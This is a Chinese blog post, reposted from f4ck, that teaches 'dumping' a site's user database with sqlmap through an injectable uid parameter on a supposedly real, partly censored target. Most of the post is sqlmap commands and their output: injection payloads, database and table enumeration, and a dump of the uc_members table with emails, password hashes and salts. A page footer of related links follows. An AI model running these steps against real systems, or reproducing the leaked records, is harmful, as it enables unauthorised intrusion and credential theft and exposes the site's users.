PHP内裤,用sqlmap来扒下她的内裤吧~
2012-2-10 22:06 Friday用sqlmap来扒下她的内裤吧~
这久十分流行各种扒裤,虽说一般来说都是拿下站以后再用脚本脱,但是有时候不得已可能也需要从注入点脱,这久离不开各种注入工具
杨凡写了穿山甲怎么脱,sqlmap脱裤本来是07写的,我曾经用她脱过,先简单写一个,呵呵
好吧,用一个真实的注入地址来演示(和谐过)
看命令记录:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:06:11
[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:06:11] [INFO] testing connection to the target url
[17:06:13] [INFO] testing if the url is stable, wait a few seconds
[17:06:14] [INFO] url is stable
[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic
[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic
[17:06:15] [WARNING] GET parameter 'uid' is not dynamic
[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)
[17:06:15] [INFO] testing sql injection on GET parameter 'uid'
[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:07:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:07:26
注意红色的字,说明参数uid存在注入。好吧,发现代码和颜色不能叠加,注意这里:GET parameter 'uid' is vulnerable.
好接下来列出所有数据库:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:08:57
[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:08:57] [INFO] resuming injection data from session file
[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:08:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:08:59] [INFO] fetching database names
[17:08:59] [INFO] the SQL query used returns 4 entries
[17:09:00] [INFO] retrieved: information_schema
[17:09:00] [INFO] retrieved: mysql
[17:09:00] [INFO] retrieved: test
[17:09:00] [INFO] retrieved: ucenter
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ucenter
[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:09:00
红色部分即是列出的数据库(木有颜色,就是available databases [4]:那里),然后设定数据库,列出表:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables
结果就不弄出来了,表太多,直接看列出表uc_members的字段名(uchome用户数据都在这里,要扒的就是这个,嘿嘿):
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:11:44
[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:11:44] [INFO] resuming injection data from session file
[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:11:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FL
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:11:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'
[17:11:46] [INFO] the SQL query used returns 12 entries
[17:11:46] [INFO] retrieved: uid
[17:11:47] [INFO] retrieved: mediumint(8) unsigned
[17:11:47] [INFO] retrieved: username
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: password
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: email
[17:11:48] [INFO] retrieved: char(32)
[17:11:48] [INFO] retrieved: myid
[17:11:48] [INFO] retrieved: char(30)
[17:11:48] [INFO] retrieved: myidkey
[17:11:48] [INFO] retrieved: char(16)
[17:11:48] [INFO] retrieved: regip
[17:11:49] [INFO] retrieved: char(15)
[17:11:49] [INFO] retrieved: regdate
[17:11:49] [INFO] retrieved: int(10) unsigned
[17:11:49] [INFO] retrieved: lastloginip
[17:11:49] [INFO] retrieved: int(10)
[17:11:49] [INFO] retrieved: lastlogintime
[17:11:50] [INFO] retrieved: int(10) unsigned
[17:11:50] [INFO] retrieved: salt
[17:11:50] [INFO] retrieved: char(6)
[17:11:50] [INFO] retrieved: secques
[17:11:50] [INFO] retrieved: char(8)
Database: ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(32) |
+---------------+-----------------------+
[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:11:51
不用多说了吧,开始脱裤,我们只需要脱其中的一些字段,然后--threads把线程数调高,用--start和--stop设定要扒的记录范围,我们扒几条记录看看:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:14:22
[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:14:22] [INFO] resuming injection data from session file
[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:14:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:14:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'
[17:14:24] [INFO] retrieved: 2
[17:14:24] [INFO] retrieved: xx1@163.com
[17:14:24] [INFO] retrieved: 0a9c9d7451d0e78938747083add7fa5a
[17:14:24] [INFO] retrieved: 001c6f
[17:14:24] [INFO] retrieved: asdf@yeah.net
[17:14:25] [INFO] retrieved: 3
[17:14:25] [INFO] retrieved: xx086@163.com
[17:14:25] [INFO] retrieved: 02b3f6122a2882ffdd9ee9f12be60a6e
[17:14:25] [INFO] retrieved: 44d1f1
[17:14:25] [INFO] retrieved: x520@gmail.com
[17:14:25] [INFO] retrieved: 5
[17:14:25] [INFO] retrieved: xlyb@163.com
[17:14:26] [INFO] retrieved: 97226e4861d8e3251af4256781b78868
[17:14:26] [INFO] retrieved: 297944
[17:14:26] [INFO] retrieved: txen@vip.qq.com
[17:14:26] [INFO] retrieved: 73
[17:14:27] [INFO] retrieved: 0x40@qq.com
[17:14:27] [INFO] retrieved: 7e55a749a63c427a767cb1d9aa826f3b
[17:14:27] [INFO] retrieved: d84a57
[17:14:27] [INFO] retrieved: yx@126.com
[17:14:27] [INFO] retrieved: 74
[17:14:28] [INFO] retrieved: x540@qq.com
[17:14:28] [INFO] retrieved: 10bb282c88331c6e95d14700ba9390f0
[17:14:28] [INFO] retrieved: 589369
[17:14:28] [INFO] retrieved: hx@xxoo.org
[17:14:28] [INFO] retrieved: 75
[17:14:28] [INFO] retrieved: 0x840@qq.com
[17:14:29] [INFO] retrieved: 313bfb31b5cd6e58797291665a7b6ed1
[17:14:29] [INFO] retrieved: 229620
[17:14:29] [INFO] retrieved: fexg@xxoo.org
[17:14:29] [INFO] retrieved: 76
[17:14:29] [INFO] retrieved: 0.4.658940@qq.com
[17:14:29] [INFO] retrieved: 1846282a634da3c90af4e0250931b8c2
[17:14:30] [INFO] retrieved: da5025
[17:14:30] [INFO] retrieved: sxg@xxoo.org
[17:14:30] [INFO] retrieved: 77
[17:14:30] [INFO] retrieved: 0x6540@qq.com
[17:14:30] [INFO] retrieved: 8ff58083e52ad0b45c29daa6e6a92b82
[17:14:30] [INFO] retrieved: 024f42
[17:14:31] [INFO] retrieved: chfn@xxoo.org
[17:14:31] [INFO] retrieved: 78
[17:14:31] [INFO] retrieved: f4540@qq.com
[17:14:31] [INFO] retrieved: 46bbf0639b4195c4a5e0520f3d021315
[17:14:31] [INFO] retrieved: fed606
[17:14:31] [INFO] retrieved: rafg2@gmail.com
[17:14:32] [INFO] retrieved: 79
[17:14:32] [INFO] retrieved: 0.4.687540@qq.com
[17:14:32] [INFO] retrieved: 3de40cc0ba602a744eac8ec5a0da20d9
[17:14:32] [INFO] retrieved: ef16e8
[17:14:32] [INFO] retrieved: 123@123.com
[17:14:32] [INFO] retrieved: 80
[17:14:33] [INFO] retrieved: 0.474.6540@qq.com
[17:14:33] [INFO] retrieved: 2b70f5a5ada849ba5ef6fcdb8e04de82
[17:14:33] [INFO] retrieved: f1750c
[17:14:33] [INFO] retrieved: editfrc@xxoo.org
[17:14:33] [INFO] retrieved: 81
[17:14:33] [INFO] retrieved: f8dna@gmail.com
[17:14:34] [INFO] retrieved: 29ca2bc5046ebd4e84ae42e39ac1ed94
[17:14:34] [INFO] retrieved: 93d41a
[17:14:34] [INFO] retrieved: fanfg@xxoo.org
[17:14:34] [INFO] retrieved: 82
[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: ucenter
Table: uc_members
[12 entries]
+----------------------------+----------------------------------+--------+-----+--------------------------+
| email | password | salt | uid | username |
+----------------------------+----------------------------------+--------+-----+--------------------------+
| xxoo@yeah.net | 0a9c9d7451d0e78938747083add7fa5a | 001c6f | 2 | 0-9xx@163.com |
| xxoo@gmail.com | 02b3f6122a2882ffdd9ee9f12be60a6e | 44d1f1 | 3 | 0.1086@163.com |
| xxn@vip.qq.com | 97226e4861d8e3251af4256781b78868 | 297944 | 5 | 0.1lx@163.com |
| xxvv@126.com | 7e55a749a63c427a767cb1d9aa826f3b | d84a57 | 73 | 0.x0@qq.com |
| asdfasd@xxoo.org | 10bb282c88331c6e95d14700ba9390f0 | 589369 | 74 | 0.x546540@qq.com |
|xxg@xxoo.org | 313bfb31b5cd6e58797291665a7b6ed1 | 229620 | 75 | 0.4.6xxx840@qq.com |
| shi_ying@xxoo.org | 1846282a634da3c90af4e0250931b8c2 | da5025 | 76 | 0.4xx940@qq.com |
| chen_shan@xxoo.org | 8ff58083e52ad0b45c29daa6e6a92b82 | 024f42 | 77 | 0xx6540@qq.com |
| rafikixx@gmail.com | 46bbf0639b4195c4a5e0520f3d021315 | fed606 | 78 | 0x4540@qq.com |
| 123@123.com | 3de40cc0ba602a744eac8ec5a0da20d9 | ef16e8 | 79 | x40@qq.com |
| editorc@xxoo.org | 2b70f5a5ada849ba5ef6fcdb8e04de82 | f1750c | 80 | xxx@qq.com |
| fangxg@xxoo.org | 29ca2bc5046ebd4e84ae42e39ac1ed94 | 93d41a | 81 | 0xxa@gmail.com |
+----------------------------+----------------------------------+--------+-----+--------------------------+
[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'
[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
看见了吧,都在一个csv文件里了,csv文件就是以逗号分割记录的文件,什么excel什么access什么mysql都可以往里面导,比穿山甲的html好吧,嘿嘿。截个图:
好了,就说这么点,sqlmap其实很强大,还是跨平台的哦,亲
转自 f4ck
PHP内裤,用sqlmap来扒下她的内裤吧~相关推荐
- 网站资源文件下载不了怎么办?一个方法教你如何轻松扒下
日常生活中需要到网站上面进行资料查找,但是找到的资料又要付费才能进行下载,实在是太麻烦了.那如何快速轻松扒下? 下面教你两个方法,学会后网页上的内容任意复制. 小编使用的是百度浏览器,你也可以使用别的 ...
- SQLMap在windows下的安装、使用及进阶
SQLMap 简要介绍 支持的数据库 支持的注入方式 其他功能 安装 SQLMap的使用 SQLMap的入门 判断是否存在注入 判断文本中的请求是否存在注入 查询当前用户下的所有数据库 获取数据库中的 ...
- 手慢无,阿里云神作被《Spring Boot进阶原理实战》成功扒下,限时
又来给大家分享好书了:郑天民老师的 <Spring Boot进阶:原理.实战与面试题分析>,别问网上有没有开源版本!问就是我也不知道,哈哈!但我会有 郑天民是谁? 资深架构师和技术专家,有 ...
- 爬虫扒下 bilibili 视频信息
B站算是对爬虫非常非常友好的网站啦! 修改转载已取得腾讯云授权 在以上两篇文章中我们已经在腾讯云服务器上搭建好了 Python 爬虫环境了,下一步就是在云服务器上爬上我们的爬虫,抓取我们想要的数据: ...
- 好慌!支付宝App现“不锈钢内裤” 官方解释:已改为“煮内裤的锅”
今天轮到支付宝翻车了,尴尬中带了点好笑. 今天,有网友发现支付宝App的每日必抢栏目出现了名为"不锈钢内裤"的产品,这还真是看得有点让人懵圈的. 随后这名网友就@支付宝,调侃了一下 ...
- sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程
昨天对一个网站做渗透测试,本来想自己写脚本来sql注入的,但是觉得麻烦还是用了sqlmap 这一用发现sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,觉得这样就够用了,直到昨天才发 ...
- 批量找注入 python3+sqlmap结合
注入一直都是用sqlmap 导致本来就不怎么精通的手工注入现在就忘的一干二净 想实战练习 却一时又找不到有注入的网站 于是便有了这篇文章 想找个批量获取域名链接的工具 但都是只是获取域名而 ...
- IBatisNet的配置(SqlMap.config)
IBatisNet DataMapper是通过XML文件来配置的,配置文件名称我们通常默认为SqlMap.Config,配置文件中指定了我们项目的数据库连接字符串,以及数据库表的映射文件等等. 下面我 ...
- 美国电子烟走向规范化,“下一站”是中国?
文 | 曾响铃 来源 | 科技向令说(xiangling0815) 近日,有关电子烟的相关新闻再上头条,据央视新闻报道,国家烟草专卖局.国家市场监督管理总局将继续推动电子烟监管工作深入开展,构建电子烟 ...
- 311运动(冰箱与内裤)的由来
什么是311运动,冰箱和内裤具备怎样的关系 我想进来的诸位一定对标题感到十足的好奇--311可以理解,3月11日嘛.可是冰箱与内裤是几个意思?故事的开始发生在3月11日的傍晚.下班后,有一个同事和我到 ...
最新文章
- 笔记本蓝牙显示输入码无效_如何凭借一把键盘游走桌面?米物蓝牙双模键盘
- EdgeGallery — MEP — 系统架构
- 项目整体管理:指导和管理项目工作
- 基线_电离层、对流层改正模型对基线解算的影响
- libvirtError: 无效参数:could not find capabilities for domaintype=kvm
- 快速掌握MATLAB应用,只要从这一步开始!
- java中实现将一个数字字符串转换成逗号分隔的数字串, 	即从右边开始每三个数字用逗号分隔
- sql注入攻击和PreparedStatement有效防止sql注入攻击
- C语言不调用库函数画直线
- Passing the Message(HDU-3410)
- 检测浏览器是否支持ajax ===小代码
- Mac AI技术图像编辑软件:Luminar Neo
- [摘录]第5章 谈判原则
- paip.java 线程无限wait的解决
- Linux 内核下载地址
- pikachu逻辑漏洞实验
- Unity Shader :实现漫反射与高光反射
- 如何在IDM中设置代理服务器
- 全向轮机器人运动学分析
- 【Linux修炼】开篇